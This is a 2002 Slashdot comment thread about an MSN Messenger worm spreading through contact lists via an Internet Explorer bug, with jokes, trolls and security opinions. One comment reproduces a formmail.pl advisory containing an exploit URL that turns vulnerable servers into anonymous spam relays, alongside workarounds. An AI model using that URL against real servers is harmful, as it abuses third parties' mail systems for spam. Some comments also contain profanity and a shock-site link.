The virus probably just gets the COM object that their messenger implements through javascript. The security hole is that IE lets a web page talk to the messenger client. I would guess that it does that so you can add contacts by clicking on web links and stuff like that.

Finally! (5, Funny)

digitalcowboy (142658) | more than 12 years ago | (#3004106)

I've been reluctant to use the MS IM client because it didn't appear they had fully integrated it's virus abilities with all their other software. Now that it's part of a fully integrated Microsoft Virus Productivity Suite, I'm ready!

Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?

It works by: (0)

Anonymous Coward | more than 12 years ago | (#3004107)

using the document.open bug in IE. Details of which were first published Here [tom.me.uk] Users of third party clients are not affected [trillian.cc] -H2

Microsoft Article Virus Sweeps Slashdot (3, Funny)

guttentag (313541) | more than 12 years ago | (#3004111)

Four entries in the Microsoft topic [slashdot.org] in one day?
  1. Microsoft Instant Messenger Virus Sweeps Net [slashdot.org]
  2. What is .NET? [slashdot.org]
  3. States Demand Windows Source Code [slashdot.org]
  4. Details of MSFT's Antitrust Lobbying [slashdot.org]
There were none yesterday, or the day before... the calm before the storm...

FUCK OFF (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3004113)

Fuck off slashdot you fucking useless asshole mother fuckers.

It's only a matter of time... (4, Insightful)

Max the Merciless (459901) | more than 12 years ago | (#3004122)

until someone unleashes a virus that does some serious damage. If I was a "terrorist" hell bent on punishing the Western world for whatever percieved sins, I'd be learning how to make, or hiring programmers, to unleash a truely destructive virus.

It's been said many times before, but I'll say it again, any monoculture is far more vulnerable to attack than a diverse system. Relying on one system, be it Microsoft or even Linux, is foolish.

The destruction of the Microsoft monopoly is not just a matter of helping improve competition, it is a serious security matter. No amount of campaign donations or legal semantics should distract the government from its task of providing security.

Re:It's only a matter of time... (0)

Anonymous Coward | more than 12 years ago | (#3004141)

Get real!

It's a microsoft ruse! (0)

SweetAndSourJesus (555410) | more than 12 years ago | (#3004131)

Fired up Messenger for the first time ever, just hoping I get to see this. It's all a microsoft conspiracy to get slashdotters using their product.

worm primer (2, Interesting)

elbobo (28495) | more than 12 years ago | (#3004133)

just gave it a go, and it didn't affect me. running winxp with netcaptor [netcaptor.com] browser (embeds ie) and trillian [trillian.cc] (im client that connects to the msn messanger network among others)

not that i was expecting it to work.

what amuses me though, is how the linked page from this article reads like a very handy worm writing primer, suggesting better propogation methods -

Optimized scanning routines, hitlist scanning, and permutation scanning can be combined to produce hyper virulent Warhol Worms. Since they are so fast, such worms would be the vehicle of choice for delivering malicious payloads to the net at large.

This is dumber than a mail worm (3, Insightful)

J.D. Hogg (545364) | more than 12 years ago | (#3004136)

I would be impressed to see a worm silently infect your machine and try to infect your contacts. But this one asks you a *click a url* ?? Anybody who doesn't dismiss a message with a URL or an attachment from somebody they don't know, whether it's in an instant message or an email, deserves to be infected (and also should have their computers taken away from them and a flyer explaining them why they shouldn't talk to strangers in the street given to them instead).

But /. is right, it is a Warhol virus : all the posters who reported this non-news got their 15 minutes of fame on Slashdot.

Re:This is dumber than a mail worm (2, Informative)

joemiah (2398) | more than 12 years ago | (#3004198)

It spreads through your contacts, so the recipients are more than likely receiving the URL from someone they know.

Re:This is dumber than a mail worm (2, Informative)

CrayzyJ (222675) | more than 12 years ago | (#3004220)

"somebody they don't know"

It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever.

Karma Suicide! (-1, Troll)

jeffy124 (453342) | more than 12 years ago | (#3004137)

After 600+ posts and 20 articles, my karma has been peaked at 50 for what seems like forever now. My new campaign: Karma Suicide!! Every post from now until my karma's back at zero will be this short crapflood posted with my +1 bonus. So moderators: Do your worst! You got only 17 more points to go! Mod me troll/OT/Overrated/Whatever to get my karma back to where it began. Do this ASAP! And as for the rest of you, commit karma suicide today!

Not that URL (2)

phliar (87116) | more than 12 years ago | (#3004139)

Was that just an example URL?


GET /cool.html HTTP/1.1
Host: www.masenko-media.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Win32)

HTTP/1.1 404 Not Found
Date: Thu, 14 Feb 2002 00:07:30 GMT
Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8 PHP/4.0.6 DAV/1.0.2 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /cool.html was not found on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>Apache/1.3.20 Server at www.masenko-media.net Port 80</ADDRESS>
</BODY></HTML>

(No Micros**t anywhere on these machines. Cheers!)

404 error (1)

skt (248449) | more than 12 years ago | (#3004145)

I suggest not following the link.

hmm, I went to that link and got a 404 error.. nothing to worry about if you use mozilla, but how can this do something bad to IE? Did they take the page down?

One shoe drops (5, Interesting)

Anonymous Coward | more than 12 years ago | (#3004163)

Well, this is one of a number of Damoclean swords hanging over the Net. A couple of other widely predicted "what if..?"s have already come to pass: Nimda was the first successful implementation of one, attacking through multiple vulnerabilities; others would include yesterday's SNMP freakout, the separate possibility of routing protocol attacks, yadda yadda, oh look... you all read bugtraq|incidents|nanog, et al., and know the score, and are presumably not very vulnerable. (Although one especially interesting aspect of this and other worms is that it defeats the security posture that says "take yourself out of the top 10% of easy sites to break into [by, eg., ONLY implementing the SANS top 10/20 fixes] and the kiddies will pass you by". If you're vulnerable, you WILL be hit. ) "But I haven't got anything worth taking, why would anyone want to crack me?" *sigh*...


The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.


Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.

Mebbe I'm just bitter cos I'vre been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)

Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.

Another site (0)

Anonymous Coward | more than 12 years ago | (#3004172)

http://www.angelfire.com/zine2/me1 . It appears to launch a fake error page.

formmail.pl (5, Informative)

TheFlu (213162) | more than 12 years ago | (#3004177)

Just an FYI about the lack of security on older versions of formmail.pl You should replace the exploitable version, if you are using it yourself.

Formmail.pl Can Be Used As An Open Mail Relay

Summary
The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
This vulnerability has already been exploit by spammers in many installations of Formmail.pl.

Details
Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program two distribute their email (SPAM).

Exploit:
A URL such as the following:
http://www.example.com/cgi-bin/FormMail.pl? recipient=email@address-to-spam.com&message= Proof%20that%20FormMail.pl%20can%20be%20used%20to% 20send%20anonymous%20spam.

Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.

Workaround:
1. Remove your formmail.pl script until the author provides a fix.
or:
2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.

It could be worse... (4, Funny)

Cowculator (513725) | more than 12 years ago | (#3004191)

"Go To http://www.goatse.cx NoW !!!"

Imagine if your friends suddenly knew not only that you were gullible enough to fall for a virus like that, but that you had seen that site...

So THAT's where the formmail.pl requests (2)

SCHecklerX (229973) | more than 12 years ago | (#3004197)

are from!!!


I know that formmail.pl has some vulnerabilities, and figured people were just probing me.


This would explain where it is coming from. Add this to the code red etc that my poor little web server on DSL has to deal with :(

Warhol Virus (1)

Metrollica (552191) | more than 12 years ago | (#3004201)

To me this sounds like Code Red, only speeded up so it could do a lot more scans in a much shorter period of time and infect many more computers. The author must be a bit more experienced than the author of Code Red because they have built in multithreading which wasn't in Code Red. This makes it possible to probe and attack multiple machines at once and even begins by attacking a list of 50,000 machines known to have good internet connections.

Have any A/V Companies... (3, Informative)

lblack (124294) | more than 12 years ago | (#3004206)

Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender [bitdefender.com] have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAffee.

I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?

Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propogating, though, in that it requires the server-side in order to be malicious, or do anything at all.

That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.

-l

P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company. ;)

go to the web site i dare you :) (0)

Anonymous Coward | more than 12 years ago | (#3004219)

how many linux users have actually went to the web site just for fun????

See you at school? (-1, Offtopic)

Omega (1602) | more than 12 years ago | (#3004234)

Anna says:
See you at Masenko-Media!
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?
or Connect with...

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>